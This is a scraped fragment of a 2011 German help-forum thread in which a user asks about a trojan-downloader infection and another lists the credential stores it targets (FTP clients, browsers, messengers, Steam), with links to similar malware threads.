N0S Malware Schreck Bewertung: Registriert seit: Nov 2005 Beiträge: 3.509 Power: 46	jo dann sollte dein System schon sauber sein. Hier nochmal ne kurze Auflistung was es so klaut: - FlashFXP/SmartFTP - Opera/Firefox/Chrome/IE - MSN/Trillian - Steam Die Liste ist nicht vollständig, besonders FlashFXP dürfte dich aber interessieren^^ „...wenn man selbst die Sklaverei in sich überwindet...“ SFT Decrypter 2009 ; FXP Tool ; RR Blog

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Trojan.Win32.Diple.azhf	Fedja	Viren, Trojaner & Malware	1	17.09.2011 19:59
[Vista] - Ich kann Trojan.Win32.Agent.hsbu nicht löschen	LilWitch	Windows	4	17.04.2011 18:04
Frage: Trojan.Win32	MACK59	Sicherheit & Datenschutz	12	30.03.2009 15:36
Trojan-Keylogger.Win32.Fung	HeroDX	Sicherheit & Datenschutz	8	02.11.2008 23:29
[PC] - WoW Trojan-Downloader.Win32.Agent variant	T!gHt-F!gHt	Gamer Support	0	27.04.2008 14:21

18.02.2011, 18:48	# 5
Decryptor Psychopath Bewertung: Registriert seit: Sep 2005 Beiträge: 5.311 Power: 49 Themenstarter	ich bin irgendwie grad zu blöd dafür, was macht/hat es gemacht es nu bzw wie werd ich es wieder los

18.02.2011, 20:19	# 7
Decryptor Psychopath Bewertung: Registriert seit: Sep 2005 Beiträge: 5.311 Power: 49 Themenstarter	ganz grose klasse autostart is nix

Viren, Trojaner & Malware

Win32.Trojan-Downloader.MSIL.Agent.xf.3.a